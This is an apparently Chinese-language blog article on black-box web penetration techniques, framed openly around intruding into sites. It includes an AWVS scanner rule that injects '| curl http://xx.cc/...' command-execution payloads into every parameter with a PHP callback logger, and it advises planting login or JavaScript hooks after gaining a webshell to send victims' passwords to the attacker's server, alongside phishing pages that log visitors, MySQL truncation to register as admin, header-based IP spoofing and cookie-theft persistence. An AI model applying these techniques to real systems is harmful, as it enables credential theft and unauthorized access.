Web黑盒渗透思路之猜想
场景:WEB后台爆破
后台爆破很多人都会选择最经典的模式,如字典爆破,挖掘未授权访问漏洞,挖掘验证码漏洞(未刷新,验证码识别)等方法。
猜想:
1、后台程序是采用MD5加密的方式,并且验证密码跟被验证密码都是从PHP的MD5加密处理的 (PHP5~7存在此BUG),例如:
原理:
程序在处理哈希字符串时,会利用”不等于 或 等于 来对哈希值进行比较,它把每一个以 0E 开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以0E开头的,那么PHP就会认为他们相等。那么在爆破的时候 字典加入一个MD5加密之后以0e开头的明文密码即可。
2、前台有注册,是否跟后台用的是同一个SESSION文件,例如:
这个SESSION 我们可以假设。程序员在开发中 注册一个会员那么就会添加一条数据到数据库里。 登录验证成功后会写入一个session,那么后台验证中判断session他可能是这样写的。
if($_SESSION['user']){
returnTrue;
}
这个设计缺陷 可以假设 他的session跟前台用户的session用的是同一个。从而导致一个未授权访问。(前台登录之后访问后台) 当然也可以说成是越权。因为我们从一 个注册会员登录写入了session 从而导致有访问后台的权限 PS:具体情况得看代码怎么写。
以上方法 我们可以幻想很多很多种漏洞。列如这个
我们又可以这样猜想:system的键名是用来判断权限。1则为管理员 0则为普通用户 在前台有个注册功能,那么我们又联想到了一个MYSQL的一个溢出漏洞my.ini。
sql-mode=”NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”
比如一个表的结构是这样的:
createtableadmin(
username varchar(10) notnull,
passwd varchar(10) notnull);
可以看到username跟passwd的字节为10,但是my.ini设置成
sql-mode=”NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION”
的话,就算超出也会添加成功,比如:
insertintoadminvalues(‘1234567891 2’,'123456');
他不会插入“1234567891 2 ”而是插 ”1234567891“ 因为指针到1的时候字节就等于10了。因此我们注册会员的时候,admin、空格、空格、空格、空格、空格、XX,然后这样就会注册到了admin。
切回话题,我们又可以很离谱的这样猜想。前台注册用户用的数据库跟后台是同一个数据表字段。那么我们可以从前台注册然后登录后台。(这种我还是碰到过的)
当然思路还是有很多很多的,得看你去怎么去猜想他的代码了
场景:WEB扫描器忽略的功能
扫描器相信大家都是用过的,比如一些知名的扫描器:BURP、AppScan 等,但是扫描器也有不够人性化的时候,例如爬虫扫描。
这样我们就以扫描为主题:
1、表单破解,有验证码
2、扫描values型SQL注入
3、存储XSS误报多
4、被隐藏的某种存在高危漏洞的功能(列如 存在命令执行 没有任何响应的情况下 扫描器判断不出来)
在这里公布一个自写AWVS的扫描规则库(扫描命令执行无响应):
规则库目录说明:(放到规定目录即可)
文件名:cmd.script
解释:扫描过程中 每个参数都会添加
例如: | curl http://xx.cc/ 然后发送请求 i_url 变量是当前扫描的YRL
var targetUrl = new TURL(scanURL.url);
// 获取当前的方案 也就是获取爬虫到的当前请求
var scheme = getCurrentScheme();
// 创建一个HTTP的工作(要求)
var http = new THTTPJob();
// 在新创建的作业中填充计划 将当前请求添加到HTTP
scheme.populateRequest(http);
http_top = http.request; //获取HTTP请求头
//http_top.msg2 获取文件+参数
hmsg2 = http_top.msg2.replace(/&/g, "-")
i_url = scanURL.hostPort+"/"+hmsg2;
// 一个方案可以有多个输入
for (var i=0;i { // 每个输入可以有多个变化 var variations = scheme.selectVariationsForInput(i); for (var j=0; j < variations.count; j++) { // 负荷的变化 scheme.loadVariation(variations.item(j)); // 设置我们的有效载荷的输入值 scheme.setInputValue(i, unescape('curl http://xx.cc/xd.php?i='+i_url)); // 创建一个HTTP的工作(要求) var job = new THTTPJob(); // 设置工作targeturl URL job.url = targetUrl; // 在新创建的作业中填充计划 scheme.populateRequest(job); // 执行HTTP工作 job.execute(); } } // 一个方案可以有多个输入 for (var i=0;i { // 每个输入可以有多个变化 var variations = scheme.selectVariationsForInput(i); for (var j=0; j < variations.count; j++) { // 负荷的变化 scheme.loadVariation(variations.item(j)); // 设置我们的有效载荷的输入值 scheme.setInputValue(i, unescape('| curl http://xx.cc/xd.php?i='+i_url)); // 创建一个HTTP的工作(要求) var job = new THTTPJob(); // 设置工作targeturl URL job.url = targetUrl; // 在新创建的作业中填充计划 scheme.populateRequest(job); // 执行HTTP工作 job.execute(); } } // 一个方案可以有多个输入 for (var i=0;i { // 每个输入可以有多个变化 var variations = scheme.selectVariationsForInput(i); for (var j=0; j < variations.count; j++) { // 负荷的变化 scheme.loadVariation(variations.item(j)); // 设置我们的有效载荷的输入值 scheme.setInputValue(i, unescape('| curl http://xx.cc/xd.php?i='+i_url+"%23")); // 创建一个HTTP的工作(要求) var job = new THTTPJob(); // 设置工作targeturl URL job.url = targetUrl; // 在新创建的作业中填充计划 scheme.populateRequest(job); // 执行HTTP工作 job.execute(); } } // 一个方案可以有多个输入 for (var i=0;i { // 每个输入可以有多个变化 var variations = scheme.selectVariationsForInput(i); for (var j=0; j < variations.count; j++) { // 负荷的变化 scheme.loadVariation(variations.item(j)); // 设置我们的有效载荷的输入值 scheme.setInputValue(i, unescape(' | curl http://xx.cc/xd.php?i='+i_url+")%23")); // 创建一个HTTP的工作(要求) var job = new THTTPJob(); // 设置工作targeturl URL job.url = targetUrl; // 在新创建的作业中填充计划 scheme.populateRequest(job); // 执行HTTP工作 job.execute(); } } // 一个方案可以有多个输入 for (var i=0;i { // 每个输入可以有多个变化 var variations = scheme.selectVariationsForInput(i); for (var j=0; j < variations.count; j++) { // 负荷的变化 scheme.loadVariation(variations.item(j)); // 设置我们的有效载荷的输入值 scheme.setInputValue(i, unescape(' | curl http://xx.cc/xd.php?i='+i_url+"))%23")); // 创建一个HTTP的工作(要求) var job = new THTTPJob(); // 设置工作targeturl URL job.url = targetUrl; // 在新创建的作业中填充计划 scheme.populateRequest(job); // 执行HTTP工作 job.execute(); } } 接受请求的PHP代码: 文件名:xd.php
$ip = $_SERVER["REMOTE_ADDR"]? $_SERVER["REMOTE_ADDR"] : ""; if($ip){ $i = empty($_GET['i'])? "" : $_GET['i']; $txt = htmlspecialchars($ip."-----".$i."\r\n"); $na = fopen("xd.txt", "a+"); $xie = fwrite($na, $txt); } ?> 文件名: cmd_inspect.script 解释:扫描器扫完后 发送一个HTTP请求 判断是否这个域名是否存在命令执行漏洞 // scanurl.url返回URL字符串 var targetUrl = new TURL("http://xx.cc/xd.txt"); var http = new THTTPJob(); http.url = targetUrl; http.verb = 'GET'; // 执行请求 http.execute(); var dzRes = http.response.body; //获取HTTP响应内容 if(dzRes.indexOf(scanURL.hostPort) != -1){ logInfo('message:----> yuanchengminglingzhixing!!');//扫描日志输出信息 var ri = new TReportItem();//新建报告结果 返回扫描器界面 ri.LoadFromFile("cmd.xml"); //载入模板 ri.affects = "http://xx.cc/xd.txt"; ri.request = http.request.toString(); //将HTTP请求头输出到扫描器 ri.response = http.response.body; //将HTTP响应的内容输出到扫描器 ri.fullResponse = http.response.body; //将HTTP响应的内容输出到扫描器 // 添加警报 AddReportItem(ri);//确定输出 } 回归话题,我们猜想到许许多多扫描器忽视的功能 例如:爬虫爬不到的地方,values型SQL注入,存在XSS,当然不是高危漏洞我们就不必挖掘,因为我们目的是以入侵为主,像某些逻辑漏洞我们可以无视。 场景:拿到webshell 数据密码加密的情况下获得明文密码 我们拿到webshell之后想拿到数据库的明文密码,我们一开始的思维肯定在想:逆推,撞库,还有就是嗅探 等方法。 嗅探方法:流量大,易被防火墙报警。 逆推方法:耗脑。 撞库方法:走很多个步骤。(收集数据) 其实我们可以换个角度去想的,居然我们都拿到webshell了,还不如修改 WEB程序,例如验证用户密码是否对错,如果登录成功,那么就记录他的。 例如这个。 那么问题来了,没权限修改怎么办?你可能会想到提权。。。 其实我们把目光指向到HTML。。。列如 我们可以看到有后台登录页面有包含JS的地方,那么我们可以去修改JS,利用ajax方法来获取html 的input的值来发送到我们服务器上,但是也可以不用ajax方法。 你也可以用这种方法。 比如:比如点击提交按钮被触发后 我们可以获取input的值 然后 当然如果JS文件还没权限修改的话 你可以提权。。又或者你有跟他同一个局域网的机器,进行中间人劫持。如果他是HTTPS的话 你可以往里面注入个JS。 场景:收集信息无从下手 收集信息我个人觉得这个要个人的实战经验,以及思考能力。我个人的实战经验虽不算多,不过在这里我还是说下某些信息被我们忽视掉的信息。 第一种: 列如某站:www.aa.com (未做CDN) 很多人都会走以下流程:收集子域,注册人信息以及注册过的域名 关联域名 等等。 同时也有人忽视掉了一点,那就是域名解析历史IP,我们可以这样猜想 域名没换,但是服务器搬了很多次。 当前某域名解析的IP是69.。那么我们可以大胆的假设,103开头的IP是以前的服务器,域名现在解析换成了69开头的,但是103开头的服务器网站服务还是开的,数据也没清理。。。我们把网站解析到103开头的IP,这也是一种收集信息的技巧。。。 第二种: 查找跟目标同一个内网 关联的域名,(C段 根据网站内容判断是否跟目标同一个内网,子域,或者有着关联的部门,又或者有着直接关联的,再或者从百科了解信息查找可疑跟目标同一个内网的站。。还有很多种方法) 场景:渗透攻击之钓鱼 相信鱼叉攻击法大家都是用过的,如果只是针对一个单用户钓鱼的话 我们可以利用某种辅助功能来收集信息为我们入侵铺上更好的环境。 比如:一个MVC思想的站中。收集信息(找目标源码 什么都没有 包括邮箱信息),以及 任何 任何 任何的入侵方式都无效并且我们感到无能为力的情况下。 但是有个提交留言板(毫无漏洞)。 我们可以这样想。插入一个URL,比如:http://www.a.com/1.php 1、php 代码如下:
header("Content-type: text/html; charset=gb2312"); include'./1.html'; $http = $_SERVER['HTTP_USER_AGENT']? $_SERVER['HTTP_USER_AGENT'] : ""; $ip = $_SERVER["REMOTE_ADDR"]? $_SERVER["REMOTE_ADDR"] : ""; $txt = htmlspecialchars($ip."-----".$http."\r\n"); $na = fopen("xd2.txt", "a+"); $xie = fwrite($na, $txt); ?> 2、HTML 是钓鱼内容 代码中记录到了浏览器头,我们从浏览器头可以判断目标是用了windows系统还是linux系统,列如MAC 系统 我们可以准备MAC 木马。。 我们又记录到了他的IP。我们又可以去想象 记录中的 IP是可以代理IP,公网,我们可以从他的代理IP下手,又或者C段 进行中间人攻击。。。 场景:找后台(重定向攻击法) 相信大家都有碰到过这种情况。找目标管理后台,找邮件登录的WEB域名等。。。 一开始大家的思路都是:扫描全网。靠搜索引擎 等其他非常经典的方法。 但是在某种条件下我们可以利用WEB语言或浏览器脚本语言进行辅助型攻击。 比如网站前台有提交信息给后台,我们可以利用存储XSS进行攻击从而获取到后台地址 这也是一种方法。 但是问题来了 提交了之后后台没有触发到JS怎么办? 我们可以把思路放到A标签。A标签就是重点。列如这种 我们想查找他的邮件的登录域名。 记录到的HTTP_REFERER 写入文件即可。 点击之后。 此方法也并不是百分百成功,在某种条件下才能利用。 第二种方法: 我们可以猜想目标站就只是个负责输出数据给用户看而已,而真真正正的后台是另外一个域名管理目标站,并且需要绑定HOST文件才可以。 自写小工具:https://github.com/xindongzhuaizhuai/host_ip/ 我们的思路可以这样想:扫全网(不建议),查找可疑IP(C段 历史IPC段 注册过的域名C段 等方法) 场景:查找真实IP 这个找真实IP似乎是每个安全工程师都会经历过的事情 无非就是 扫文件 找历史IP 邮寄发送 DDOS 扫全网。等方法 其他方法都还可以 但是我个人觉得扫全网 似乎就是开着坦克打飞机。至于为什么这样说 我得解释一下: 我们就拿zmap来说吧 扫描速度很好 非常强大,但是往往越强大的工具就越有缺点。 原因:zmap 流量识别太简单,他速度快的原因是因为tcp会话要3次握手才能建立,而zmap直接第一次握手就把请求断掉了。于是大多数VPS一扫就封。。。 回归话题 其实找真实IP 不妨我们试试挖掘SSRF XEE这类的漏洞 文件包含等(只要能控制目标能发送请求即可) PS:如果挖到这种漏洞的 你可以尝试利用expect等方式执行命令getshell了。 场景:被忽略掉的隐藏功能 不知道大家有没有碰到过这种功能 后台登录有记录非法操作 例如 登录后台错误5次 就被记录到数据库 然后管理界面UI输出说 此IP 登录用户名ADMIN 错误。。 我们可以这样猜想:获取IP 有漏洞 可以伪造。 我们在渗透中 有几种请求务必要修改的。那就是浏览器头 以及 : 这里公布一个火狐浏览器(中国版)存在IP伪造漏洞。 你可以往这里插入XSS,当然你也可以修改其他IP来绕过后台(有些后台登录需要IP白名单验证) 场景:后台拿不了shell却又想留后门 有很多白帽子都有挖过未授权访问。我看过很多的中国黑客入侵文章 从未发现过文章中有 未授权操作这一类的入侵网站。 我记得14年在广州培训PHP的时候。老师要求 每个小组 写一个网站程序出来,答辩结束后,源码就会被共享出来,我从20套源码(MVC思想)开始代码审计的时候 发现超过10套源码都有未授权操作这个漏洞。 也在工作实战中也碰到很多这种漏洞。。不知道是程序员太新手,还是太大意,漏洞是这样的:访问后台功能的时候做了限制(未授权不能访问),但是在其他类上却没做任何限制 列如 添加数据。 我们跳回话题: 在WEB管理后台拿webshell的时候 再无能为力的情况下,但是你又想长时间进入后台。 方法:1、有些站COOKIE也有永不过期的,你可以记录他的COOKIE利用它来进行登录。 方法:2、挖掘未授权操作。列如 尝试 添加管理员 抓包 记录 URL 以及参数 等。。。在未登录的情况下进行添加。 总结:渗透的思路中,不仅仅靠技术 靠经验 最重要的是脑子去往其他地方思考、以上我写的我只是打个比喻。其实在很多场景中得自己学会去随机应变。流程:分析—>猜想—>实验—>结果(运气好 技术有创新)
X-FORWARDED-FOR
Proxy-Client-IP
WL-Proxy-Client-IP
HTTP_CLIENT_IP
X-Forwarded-For
